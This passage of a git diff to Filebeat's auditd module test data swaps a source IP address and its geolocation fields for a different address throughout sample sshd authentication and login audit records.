@@ -289,18 +289,17 @@ "process.executable": "/usr/sbin/sshd", "process.pid": 28281, "service.type": "auditd", - "source.address": "96.241.146.97", - "source.as.number": 701, - "source.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "source.geo.city_name": "Aldie", + "source.address": "216.160.83.61", + "source.as.number": 209, + "source.geo.city_name": "Milton", "source.geo.continent_name": "North America", "source.geo.country_iso_code": "US", "source.geo.country_name": "United States", - "source.geo.location.lat": 38.9637, - "source.geo.location.lon": -77.6099, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "96.241.146.97", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.61", "user.audit.id": "700", "user.id": "0", "user.saved.id": "74" @@ -321,7 +320,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", - "event.original": "type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct=\"admin\" exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=ssh res=success'", + "event.original": "type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct=\"admin\" exe=\"/usr/sbin/sshd\" hostname=? addr=216.160.83.61 terminal=ssh res=success'", "event.outcome": "success", "event.type": [ "info" 
@@ -332,18 +331,17 @@ "process.executable": "/usr/sbin/sshd", "process.pid": 28281, "service.type": "auditd", - "source.address": "96.241.146.97", - "source.as.number": 701, - "source.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business", - "source.geo.city_name": "Aldie", + "source.address": "216.160.83.61", + "source.as.number": 209, + "source.geo.city_name": "Milton", "source.geo.continent_name": "North America", "source.geo.country_iso_code": "US", "source.geo.country_name": "United States", - "source.geo.location.lat": 38.9637, - "source.geo.location.lon": -77.6099, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "96.241.146.97", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.61", "user.audit.id": "700", "user.effective.name": "admin", "user.id": "700", diff --git a/filebeat/module/auditd/log/test/audit-rhel7.log b/filebeat/module/auditd/log/test/audit-rhel7.log index 4b193c8d559f..646215d70dfc 100644 --- a/filebeat/module/auditd/log/test/audit-rhel7.log +++ b/filebeat/module/auditd/log/test/audit-rhel7.log 
@@ -721,77 +721,77 @@ type=USER_MGMT msg=audit(1481076992.534:400): pid=1285 uid=0 auid=4294967295 ses type=USER_MGMT msg=audit(1481076992.534:401): pid=1285 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='op=add-user-to-shadow-group grp="google-sudoers" acct="some_user" exe="/usr/sbin/usermod" hostname=? addr=? terminal=? res=success' type=USYS_CONFIG msg=audit(1481076993.000:402): pid=1232 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='changing system time exe="/usr/sbin/hwclock" hostname=? addr=? terminal=? res=success' type=SERVICE_STOP msg=audit(1481077001.763:403): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=NetworkManager-dispatcher comm="systemd" exe="/usr/lib/systemd/systemd" hostname=? addr=? terminal=? res=success' -type=CRYPTO_KEY_USER msg=audit(1481077041.497:404): pid=1299 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1299 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_KEY_USER msg=audit(1481077041.497:405): pid=1299 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1299 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? 
res=success' -type=CRYPTO_SESSION msg=audit(1481077041.515:407): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_AUTH msg=audit(1481077043.046:408): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63927 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_AUTH msg=audit(1481077043.046:409): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63927 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_ACCT msg=audit(1481077043.052:410): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRYPTO_KEY_USER msg=audit(1481077043.053:411): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_AUTH msg=audit(1481077043.054:412): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? 
addr=96.241.146.97 terminal=ssh res=success' -type=CRED_ACQ msg=audit(1481077043.057:413): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' +type=CRYPTO_KEY_USER msg=audit(1481077041.497:404): pid=1299 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1299 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077041.497:405): pid=1299 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1299 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_SESSION msg=audit(1481077041.515:407): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? 
res=success' +type=USER_AUTH msg=audit(1481077043.046:408): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63927 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_AUTH msg=audit(1481077043.046:409): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63927 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_ACCT msg=audit(1481077043.052:410): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=CRYPTO_KEY_USER msg=audit(1481077043.053:411): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_AUTH msg=audit(1481077043.054:412): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? 
addr=216.160.83.61 terminal=ssh res=success' +type=CRED_ACQ msg=audit(1481077043.057:413): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' type=LOGIN msg=audit(1481077043.057:414): pid=1298 uid=0 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 old-auid=4294967295 auid=1000 old-ses=4294967295 ses=1 res=1 -type=USER_ROLE_CHANGE msg=audit(1481077043.140:415): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=USER_START msg=audit(1481077043.170:416): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRYPTO_KEY_USER msg=audit(1481077043.170:417): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1298 suid=0 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_KEY_USER msg=audit(1481077043.171:418): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1301 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? 
res=success' -type=CRYPTO_KEY_USER msg=audit(1481077043.171:419): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1301 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRED_ACQ msg=audit(1481077043.172:420): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=USER_LOGIN msg=audit(1481077043.193:421): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/0 res=success' -type=USER_START msg=audit(1481077043.194:422): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/0 res=success' +type=USER_ROLE_CHANGE msg=audit(1481077043.140:415): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=USER_START msg=audit(1481077043.170:416): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' 
+type=CRYPTO_KEY_USER msg=audit(1481077043.170:417): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1298 suid=0 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077043.171:418): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1301 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077043.171:419): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1301 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRED_ACQ msg=audit(1481077043.172:420): pid=1301 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=USER_LOGIN msg=audit(1481077043.193:421): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/0 res=success' +type=USER_START msg=audit(1481077043.194:422): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/0 res=success' type=USER_END msg=audit(1481077049.033:423): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=? addr=? 
terminal=/dev/pts/0 res=success' type=USER_LOGOUT msg=audit(1481077049.033:424): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=? addr=? terminal=/dev/pts/0 res=success' -type=CRYPTO_KEY_USER msg=audit(1481077049.054:425): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1301 suid=1000 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_END msg=audit(1481077049.057:426): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_close grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRED_DISP msg=audit(1481077049.058:427): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRYPTO_KEY_USER msg=audit(1481077049.058:428): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1298 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_KEY_USER msg=audit(1481077049.058:429): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1298 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? 
res=success' -type=CRYPTO_KEY_USER msg=audit(1481077072.307:430): pid=1325 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1325 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_KEY_USER msg=audit(1481077072.307:431): pid=1325 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1325 suid=0 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_SESSION msg=audit(1481077072.328:432): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=CRYPTO_SESSION msg=audit(1481077072.328:433): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_AUTH msg=audit(1481077072.487:434): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63929 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? 
res=success' -type=USER_AUTH msg=audit(1481077072.487:435): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63929 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_ACCT msg=audit(1481077072.491:436): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=CRYPTO_KEY_USER msg=audit(1481077072.493:437): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success' -type=USER_AUTH msg=audit(1481077072.493:438): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=ssh res=success' -type=CRED_ACQ msg=audit(1481077072.494:439): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' +type=CRYPTO_KEY_USER msg=audit(1481077049.054:425): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1301 suid=1000 rport=63927 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? 
res=success' +type=USER_END msg=audit(1481077049.057:426): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_close grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=CRED_DISP msg=audit(1481077049.058:427): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=CRYPTO_KEY_USER msg=audit(1481077049.058:428): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1298 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077049.058:429): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1298 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077072.307:430): pid=1325 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1325 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_KEY_USER msg=audit(1481077072.307:431): pid=1325 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1325 suid=0 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? 
res=success' +type=CRYPTO_SESSION msg=audit(1481077072.328:432): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=CRYPTO_SESSION msg=audit(1481077072.328:433): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_AUTH msg=audit(1481077072.487:434): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63929 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_AUTH msg=audit(1481077072.487:435): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63929 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_ACCT msg=audit(1481077072.491:436): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' +type=CRYPTO_KEY_USER msg=audit(1481077072.493:437): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? 
direction=both spid=1325 suid=74 rport=63929 laddr=10.142.0.2 lport=22 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success' +type=USER_AUTH msg=audit(1481077072.493:438): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=ssh res=success' +type=CRED_ACQ msg=audit(1481077072.494:439): pid=1324 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success' type=LOGIN msg=audit(1481077072.495:440): pid=1324 uid=0 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 old-auid=4294967295 auid=1000 old-ses=4294967295 ses=2 res=1 -type=USER_ROLE_CHANGE msg=audit(1481077072.564:441): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success' -type=USER_START msg=audit(1481077072.589:442): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open 